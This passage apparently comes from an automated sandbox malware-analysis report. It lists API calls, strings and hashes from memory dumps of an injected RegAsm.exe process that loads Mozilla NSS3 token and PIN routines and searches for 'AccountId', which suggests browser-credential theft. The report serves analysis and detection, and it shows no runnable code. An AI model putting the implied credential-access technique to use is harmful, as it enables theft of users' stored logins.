                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C91ED83
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C91ED95
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C91ED9D
                                                                                  • Part of subcall function 6C9364F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C93127C,00000000,00000000,00000000), ref: 6C93650E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3323615905-3315324353
                                                                                • Opcode ID: ac27d22f8bc687c379e6cc14bf2147d0c071a56f1e63d9e677d7b2d2fecb2c50
                                                                                • Instruction ID: 76c747c35ee1204c95e9dd787dbc7abefde5e9476aedb798a5fc1823dcc26377
                                                                                • Opcode Fuzzy Hash: ac27d22f8bc687c379e6cc14bf2147d0c071a56f1e63d9e677d7b2d2fecb2c50
                                                                                • Instruction Fuzzy Hash: CD116D39D0822C6BD7105625AC4DBBB72BCBFA170CF450534E859A6E41F724E51CC6E7
                                                                                Function 6C902CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitToken), ref: 6C902CEC
                                                                                • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C902D07
                                                                                  • Part of subcall function 6C9E09D0: PR_Now.NSS3 ref: 6C9E0A22
                                                                                  • Part of subcall function 6C9E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9E0A35
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9E0A66
                                                                                  • Part of subcall function 6C9E09D0: PR_GetCurrentThread.NSS3 ref: 6C9E0A70
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9E0A9D
                                                                                  • Part of subcall function 6C9E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9E0AC8
                                                                                  • Part of subcall function 6C9E09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9E0AE8
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0B19
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0B48
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0C76
                                                                                  • Part of subcall function 6C9E09D0: PR_LogFlush.NSS3 ref: 6C9E0C7E
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C902D22
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0B88
                                                                                  • Part of subcall function 6C9E09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9E0C5D
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C9E0C8D
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0C9C
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0CD1
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C9E0CEC
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0CFB
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0D16
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C9E0D26
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0D35
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C9E0D65
                                                                                  • Part of subcall function 6C9E09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C9E0D70
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0D90
                                                                                  • Part of subcall function 6C9E09D0: free.MOZGLUE(00000000), ref: 6C9E0D99
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C902D3B
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C9E0BAB
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0BBA
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0D7E
                                                                                • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C902D54
                                                                                  • Part of subcall function 6C9E09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9E0BCB
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0BDE
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0C16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                • API String ID: 420000887-1567254798
                                                                                • Opcode ID: 5fa62d53c714f7f3d136b83d91484df66b610623820c22e3549821c8a6d24eaf
                                                                                • Instruction ID: 701c72a616467b553621d1e58ff757d6c0ec670ad007cc7706c56e531138bb85
                                                                                • Opcode Fuzzy Hash: 5fa62d53c714f7f3d136b83d91484df66b610623820c22e3549821c8a6d24eaf
                                                                                • Instruction Fuzzy Hash: 76212175300241AFDB159F54EE9CA857BB2EBA631DF048129E508D3622CB30CC4ADBA1
                                                                                Function 6C9E0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(Aborting,?,6C8C2357), ref: 6C9E0EB8
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8C2357), ref: 6C9E0EC0
                                                                                • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9E0EE6
                                                                                  • Part of subcall function 6C9E09D0: PR_Now.NSS3 ref: 6C9E0A22
                                                                                  • Part of subcall function 6C9E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9E0A35
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9E0A66
                                                                                  • Part of subcall function 6C9E09D0: PR_GetCurrentThread.NSS3 ref: 6C9E0A70
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9E0A9D
                                                                                  • Part of subcall function 6C9E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9E0AC8
                                                                                  • Part of subcall function 6C9E09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9E0AE8
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0B19
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0B48
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0C76
                                                                                  • Part of subcall function 6C9E09D0: PR_LogFlush.NSS3 ref: 6C9E0C7E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9E0EFA
                                                                                  • Part of subcall function 6C8CAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C8CAF0E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F16
                                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F1C
                                                                                • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F25
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                • API String ID: 3905088656-1374795319
                                                                                • Opcode ID: a93ab34110c7edd726ceb067a31f26269170841cd01924e2a971f113b57b856d
                                                                                • Instruction ID: c800c68d08b0d72c92d117ec657afc4689b894f9728e907c877935e1722e5efd
                                                                                • Opcode Fuzzy Hash: a93ab34110c7edd726ceb067a31f26269170841cd01924e2a971f113b57b856d
                                                                                • Instruction Fuzzy Hash: 7FF028B59002247BEF053BA0DC49CAB3E3CDF4626CF048424FD0902602EA39E95596F3
                                                                                Function 6C944DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6C944DCB
                                                                                  • Part of subcall function 6C930FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                  • Part of subcall function 6C930FF0: PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C930FF0: PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C944DE1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C944DFF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C944E59
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA0300C,00000000), ref: 6C944EB8
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6C944EFF
                                                                                • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C944F56
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C94521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 1025791883-0
                                                                                • Opcode ID: dd7c5b4bd0947259143475ba2b87211731aa0a253aa908ec13cceea14355a80b
                                                                                • Instruction ID: 8b688557eb47cec83dbb2f11f4d5c3442b92395443e74c819ce4525011580121
                                                                                • Opcode Fuzzy Hash: dd7c5b4bd0947259143475ba2b87211731aa0a253aa908ec13cceea14355a80b
                                                                                • Instruction Fuzzy Hash: 7DF18D75E0020ACBDB08CF94D8407AEB7B6BF49358F258169D915AB781E735E981CF90
                                                                                Function 6C95CFA0 Relevance: 16.7, APIs: 11, Instructions: 212threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C95CFFC
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C9990AB
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C9990C9
                                                                                  • Part of subcall function 6C999090: EnterCriticalSection.KERNEL32 ref: 6C9990E5
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C999116
                                                                                  • Part of subcall function 6C999090: LeaveCriticalSection.KERNEL32 ref: 6C99913F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D011
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95D08E
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D109
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C95D182
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D1B9
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C95D1D8
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D1EC
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D224
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D245
                                                                                • PR_SetError.NSS3(FFFFD036,00000000), ref: 6C95D270
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$CurrentEnterErrorExitThreadValue$CriticalSection$IdentitiesLayerLeave
                                                                                • String ID:
                                                                                • API String ID: 3829233501-0
                                                                                • Opcode ID: c4c7d2e10080350ae2f32ab8fc85787d226cd4a1f540aec3bbe7db99a0af9f38
                                                                                • Instruction ID: 8b4abcea925ff690fc860727692be9f5286f99abb2e7632a73f55f2306a451e6
                                                                                • Opcode Fuzzy Hash: c4c7d2e10080350ae2f32ab8fc85787d226cd4a1f540aec3bbe7db99a0af9f38
                                                                                • Instruction Fuzzy Hash: D7713BB28042159BEB14DF34DE807EA37B8AF2131CF984174ED055AB95D336CAB4C7A2
                                                                                Function 6C940C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(6C942C2A), ref: 6C940C81
                                                                                  • Part of subcall function 6C92BE30: SECOID_FindOID_Util.NSS3(6C8E311B,00000000,?,6C8E311B,?), ref: 6C92BE44
                                                                                  • Part of subcall function 6C918500: SECOID_GetAlgorithmTag_Util.NSS3(6C9195DC,00000000,00000000,00000000,?,6C9195DC,00000000,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C918517
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940CC4
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C940CD5
                                                                                • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C940D1D
                                                                                • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C940D3B
                                                                                • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C940D7D
                                                                                • free.MOZGLUE(00000000), ref: 6C940DB5
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940DC1
                                                                                • free.MOZGLUE(00000000), ref: 6C940DF7
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940E05
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C940E0F
                                                                                  • Part of subcall function 6C9195C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C9195E0
                                                                                  • Part of subcall function 6C9195C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C9195F5
                                                                                  • Part of subcall function 6C9195C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C919609
                                                                                  • Part of subcall function 6C9195C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C91961D
                                                                                  • Part of subcall function 6C9195C0: PK11_GetInternalSlot.NSS3 ref: 6C91970B
                                                                                  • Part of subcall function 6C9195C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C919756
                                                                                  • Part of subcall function 6C9195C0: PK11_GetIVLength.NSS3(?), ref: 6C919767
                                                                                  • Part of subcall function 6C9195C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C91977E
                                                                                  • Part of subcall function 6C9195C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C91978E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                • String ID:
                                                                                • API String ID: 3136566230-0
                                                                                • Opcode ID: 13597e1d95c746aad1868317f7da48f645a0c2c4c945fbbc8bb93e07b7741bfc
                                                                                • Instruction ID: 9f85d9393ad879e5ca22fee214712893ba5bf2a217ff3badb194ef0d2d4e6c98
                                                                                • Opcode Fuzzy Hash: 13597e1d95c746aad1868317f7da48f645a0c2c4c945fbbc8bb93e07b7741bfc
                                                                                • Instruction Fuzzy Hash: B641C4B1900355ABEB009F64DC45BAF7678EF2430CF148028ED195BB41E735EA58CBE2
                                                                                Function 6C8D4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_NewLock.NSS3(00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D502A
                                                                                • PR_NewLock.NSS3(00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D5034
                                                                                • PL_NewHashTable.NSS3(00000000,6C92FE80,6C92FD30,6C97C350,00000000,00000000,00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D5055
                                                                                • PL_NewHashTable.NSS3(00000000,6C92FE80,6C92FD30,6C97C350,00000000,00000000,?,00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D506D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HashLockTable
                                                                                • String ID:
                                                                                • API String ID: 3862423791-0
                                                                                • Opcode ID: 99f2621e41b46d5b95ebc10444f0b3e76288a4d24e166a39681b9e3b0d1e4c02
                                                                                • Instruction ID: 9184d5b9bb987e4632c9128dc5bff1ae71aaa3b8929ee39e9a477e6b20e7968a
                                                                                • Opcode Fuzzy Hash: 99f2621e41b46d5b95ebc10444f0b3e76288a4d24e166a39681b9e3b0d1e4c02
                                                                                • Instruction Fuzzy Hash: AA31A3B1A413219BEF349E259E2CB977678DB12708F06C626E909C7641E378E806CBD1
                                                                                Function 6C81AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                • String ID:
                                                                                • API String ID: 1192971331-0
                                                                                • Opcode ID: 26a841516b2f4547d8829a6a5cab6f5421adebcecc466603885578b0bf51e4a7
                                                                                • Instruction ID: 46bb30919189677b514f0bed6d042e62c1ca3f2b993960108de70ca43c4b875c
                                                                                • Opcode Fuzzy Hash: 26a841516b2f4547d8829a6a5cab6f5421adebcecc466603885578b0bf51e4a7
                                                                                • Instruction Fuzzy Hash: AF312FB1904B058FDB20AFBDD64826EBBF0BF85319F01593DE98997251EB749448CB82
                                                                                Function 00407EC7 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00407ECC
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004080EE
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408113
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004081FD
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408211
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
